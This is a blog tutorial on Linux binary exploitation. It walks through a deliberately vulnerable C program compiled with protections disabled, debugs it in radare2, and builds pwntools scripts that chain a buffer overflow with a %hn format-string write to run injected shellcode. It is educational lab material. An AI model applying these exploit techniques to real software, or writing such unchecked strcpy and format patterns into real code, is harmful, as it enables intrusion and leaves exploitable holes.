Mastering Binary Exploitation: Unleashing the Power of Format String and Buffer Overflow

11 min read

November 21, 2023

Initiating Linux Binary Exploitation: A Beginner's Expedition into Code Manipulation

Mastering Binary Exploitation: Unleashing the Power of Format String and Buffer Overflow

Introduction

Welcome to the latest installment of our series on binary exploitation in Linux. Today, we delve deeper into this intriguing world, building on our previous exploration of format strings. In this chapter, we're set to embark on a fascinating journey: simultaneously exploiting multiple vulnerabilities. Specifically, we'll tackle both buffer overflow and format string vulnerabilities, demonstrating the intricate dance of exploiting these flaws in unison.

Our adventure today is not just about exploiting vulnerabilities; it's also a deep dive into the art of code analysis using radare2. This exploration will empower you to navigate through various challenges that might arise during exploit development, challenges often stemming from unexpected compiler behaviors.

So, buckle up and prepare for an insightful journey as we unravel the complexities of binary exploitation, step by step. Let's dive in!

Exploring the Vulnerable Code

Let's dive into the heart of our discussion by examining a piece of vulnerable code. This code, while simple in function, opens the door to deeper concepts of binary exploitation.

int main(int argv,char **argc) {
	short int zero=0;
	int *plen=(int*)malloc(sizeof(int));
	char buf[256];

	strcpy(buf,argc[1]);
	printf("%s%hn\n",buf,plen);
	while(zero);
}

How to Compile the Code

For those who are following along, here's the command to compile this code. As always, we maintain our consistency with the compilation process.

gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o vulnerable vulnerable.c

Understanding the Code Dynamics

What we've got here is a straightforward piece of code that takes user input and displays it. Let's break down its mechanics:

Buffer Allocation: A buffer, buf, is allocated. It's a storage for user input, which we fetch through the strcpy function. However, there's no check on the input size, hinting at a potential buffer overflow vulnerability.
Loop Control Variable: There's a variable zero which plays a crucial role in controlling the program's exit. If zero is altered, it disrupts the flow, leading to an infinite loop.
Memory Manipulation Pointer: Then, there's plen. This pointer is interesting. It writes the count of characters, printed by printf, into the memory. The format specifier %hn is key here; it writes in 2 bytes instead of the usual 4 bytes with %n. This peculiar use of the format string opens avenues for memory data manipulation.

A Note on Stack Status: It's important to remember that the actual stack status might vary in practice, which we will explore as we progress.

Crafting the Attack Strategy

Our primary goal with this exploit, as with many others, is to cleverly execute code by leveraging the design of the program. Let's explore our approach:

Buffer Overflow Consideration: The most straightforward tactic might seem to be a buffer overflow attack to alter the return address. However, this strategy has a catch. If we follow this path, we inadvertently change the value of zero, leading to an infinite loop as the program never terminates.
Challenges with Direct Injection: One might consider directly injecting "0000" at the memory location of zero. But, there's a twist: in ASCII, "0000" translates to 0x30303030 in memory, not the desired effect.

How to Navigate These Challenges? We'll split our approach into two critical steps:

Step 1: Utilizing Buffer Overflow: Firstly, we'll use the buffer overflow vulnerability to our advantage. This involves adjusting variable values to our desired figures and altering the return address to control the program's flow. Additionally, we'll insert a shellcode within the buffer, setting the stage for executing our code.
Step 2: Avoiding the Infinite Loop: To prevent falling into an infinite loop by modifying zero, we'll employ the pointer plen. By manipulating the memory address where plen points (directing it to zero), we can use the printf function and %hn to inject our preferred value into memory. In our case, this value is "00", ensuring the program doesn't end in an infinite loop. It's essential to align the number of characters printed by printf with our goal - here, translating to binary "00".

Visualizing the Strategy:

Building the Exploit Step-by-Step

Developing an exploit requires a meticulous approach. Let's walk through the stages of crafting our exploit, ensuring we manipulate the zero variable effectively.

The success of our exploit critically hinges on the precision of character count. Our objective is to strategically inject "00" into the zero variable, necessitating the printing of exactly 65536 characters, which corresponds to 0x10000 in hexadecimal. In this endeavor, we utilize the strcpy function, specifically employing argc[1], as our method for altering the memory's state. This meticulous attention to the number of characters is crucial, as it ensures our exploit precisely manipulates the memory to achieve the desired outcome.

Characters to be displayed on the screen

Next, we turn to radare2 for debugging purposes. By opening and parsing the executable with this tool, our aim is to precisely pinpoint the address of the buf variable. This step is crucial as it allows us to understand exactly where our injected data resides in memory, setting the stage for the subsequent steps in our exploit development process.

r2 ./vulnerable
aaa

Setting a breakpoint at the strcpy function, we prepare to run our crafted payload:

db <address>

Our initial payload looks like this:

from pwn import * 
import sys

payload = b'A'*65536
sys.stdout.buffer.write(payload)

Executing it in radare2:

ood "`!python3 exploit.py`"

After executing our setup, the next step is straightforward. We'll use the command "dc" to progress to the breakpoint. Following this, we'll employ the command "v" to reveal the contents of the eax register. Why eax, you ask? Well, in this scenario, eax holds the key to our puzzle – it contains the address of buf. This happens because of how the function handles its arguments: buf is transferred to eax and then strategically positioned on the stack, paving the way for strcpy to do its job effectively. It's worth noting that in my specific use of radare2, buf is referred to as "dest," a minor but crucial detail to keep in mind.

Upon successful execution and positioning ourselves at the designated instruction, an interesting revelation unfolds. We can observe that the memory address of buf now holds the content we've meticulously crafted and passed through our exploit. This is a pivotal moment in our journey of exploit development, as it visually confirms the successful manipulation of the program's memory – a clear indicator that our exploit is on the right track.

Now at this crucial juncture, our next objective is to pinpoint and modify the memory address of the zero variable using plen. To achieve this, we turn to the command "afvd" in our toolkit. This command is quite handy as it displays the variables along with their respective values in the current context. Through this process, we identify that in our memory landscape, var_6h is the label for zero, and intriguingly, var_ch represents plen. This information is vital as it lays the groundwork for the precise memory manipulation required for our exploit to succeed.

This insightful deduction comes from a close examination of the program's assembly code. If we observe the assembly code, as illustrated in the accompanying figure, we notice that var_6h is established right at the outset and is initialized with a value of 0. This clearly suggests its role as the zero variable. Similarly, var_ch emerges as a key player during the stack preparation phase, particularly in the lead-up to calling printf alongside dest (which we've previously identified as buf). This contextual placement strongly implies that var_ch is indeed what we refer to as plen. These subtle hints hidden within the assembly code are crucial for understanding and manipulating the program's behavior.

Armed with this crucial data, we are now in a position to construct a fully functional exploit.

from pwn import * 
import sys

buf_addr = <change>
buf_size = 256
zero_addr = <change>
shellcode = shellcraft.echo("hello\n")

payload = b"\x90" * 80
payload += asm(shellcode)
payload +=  b"D"*(256-80-len(asm(shellcode))) 
payload += p32(zero_addr) # pline
payload += b"AA" # zero addr -> random
payload += p32(buf_addr) # ebp -> random
payload += p32(buf_addr) # return addr
payload += b"C" * (65536-256-14)                
sys.stdout.buffer.write(payload)

The payload we've crafted is essentially a practical implementation of the strategy outlined earlier. Initially, we populate the buf variable with a sequence of NOPs (No Operation Performed), creating a buffer zone. This is followed by a strategically placed shellcode designed to execute a simple "hello" command. For the remaining space in buf, we employ the character "D" to cap it off. The crux of our payload involves inserting the memory address of zero into plen, and finally, we input the return address - which is the address of buf. To achieve the specific character count needed for our exploit (here, we use the character "C" to pad out the payload), we meticulously fill the remaining space. It’s important to note that in this scenario, the actual values of zero and ebp are inconsequential to us; they are essentially placeholders.

However, an interesting observation arises when we run this exploit: it leads to an infinite loop. This unexpected behavior signals that there's more to explore and adjust in our exploit development process.

So, what went awry? To unravel this mystery, a deeper dive into the binary is essential. Given that our primary issue is the infinite loop, our focus shifts to verifying whether the zero variable is being modified as intended. To do this, we'll zero in on the state of the program immediately following the execution of strcpy. This targeted approach will allow us to scrutinize the relevant changes and interactions at a critical juncture in the exploit's execution, shedding light on why the infinite loop is occurring.

After reaching the crucial point post-strcpy execution, our next step is to reapply the "afvd" command. This time, our goal is to acquire the memory address of the variable var_ch, which we know represents plen. Following this, we'll employ the "pd" command to delve into the memory and examine the contents of var_ch. This process is vital for understanding how our exploit interacts with the memory and will provide valuable insights into the state and behavior of plen within the program's memory structure.

In the provided image, we get a clear view of the stack's contents, offering us a crucial checkpoint in our analysis. This visual representation confirms that our buffer overflow attempt has indeed been successful – evidenced by the injection of memory addresses and the presence of "AA" characters (represented in hexadecimal as 41). However, there's a twist: the number of characters isn't aligned as anticipated. The data appear to be in disarray. A closer examination reveals that the intended return address has been inadvertently occupied by the "C" padding, not the actual buffer address as planned. Additionally, the ebp (base pointer) is not positioned correctly. To better understand this misalignment, let's turn to a diagram for a more visual explanation:

To achieve the correct alignment, we deduce that an addition of 6 more characters is necessary. This begs the question: How did this oversight occur in our initial calculations?

The root of our miscalculation lies in an unexpected twist introduced by the compiler: it added "2 plen" into the mix, throwing our original strategic calculations off balance. Upon closer inspection of the main function's variables, as depicted in the image above, we notice that both var_ch and plen are occupying additional space on the stack than we initially accounted for. This additional space usage by the compiler alters the memory layout we based our exploit on. To better grasp this alteration and its impact on our exploit, let's refer to a more detailed image that visually lays out the current stack situation:

Moreover, a closer examination of var_ch reveals another crucial detail: contrary to the typical 4-byte occupation, it actually occupies 6 bytes. Armed with this revelation and the insights previously gathered, we're now poised to revise our exploit accordingly. Let's take a look at how the updated exploit might be structured:

from pwn import * 
import sys

buf_addr = 0xfffecf4c 
buf_size = 256
zero_addr = 0xfffed052 #buf_addr + buf_size + 4 + 2
shellcode = shellcraft.echo("hello\n")

payload = b"\x90" * 80
payload += asm(shellcode)
payload +=  b"D"*(256-80-len(asm(shellcode))) 
payload += p32(zero_addr) # var_ch
payload += b"EE" #2 bytes of var_ch
payload += b"AA" # zero
payload += b"EEEE" #plen
payload += p32(buf_addr) # ebp
payload += p32(buf_addr)
payload += b"C" * (65536-256-20)                
sys.stdout.buffer.write(payload)

Upon executing our revised exploit within radare2, we can observe a satisfying alignment: all the values now correspond precisely as intended.

By completing the execution process, we reach a pivotal moment: the successful execution of our code is now evident.

Interestingly, a closer look reveals that after executing printf, we can adeptly modify the memory values, skillfully circumventing the potential for an infinite loop.

Conclusions

In today’s enlightening journey, we have navigated the complex waters of binary exploitation, focusing on the confluence of buffer overflow and format string vulnerabilities. This thorough exploration has not only reinforced our theoretical understanding but also highlighted the crucial importance of practical experimentation and adaptability in the field of cybersecurity.

Throughout this process, we uncovered how minute details, such as unexpected memory allocation by the compiler, can significantly deviate our initial plans. This experience underscores the importance of meticulous evaluation and a step-by-step problem-solving approach. It also illuminates the invaluable role of tools like radare2 in visualizing and manipulating a program’s memory structure.

The ability to adapt and refine our approaches in the face of unexpected challenges is essential. Each obstacle encountered and overcome not only enhances our exploitation technique but also deepens our understanding of the systems we seek to protect.

In conclusion, this chapter has been more than an exercise in exploit development; it's been a lesson in tenacity and continuous learning. It reminded us that in the realm of cybersecurity, theory and practice go hand in hand, and being prepared for the unexpected is an integral part of our quest to strengthen and secure our digital systems.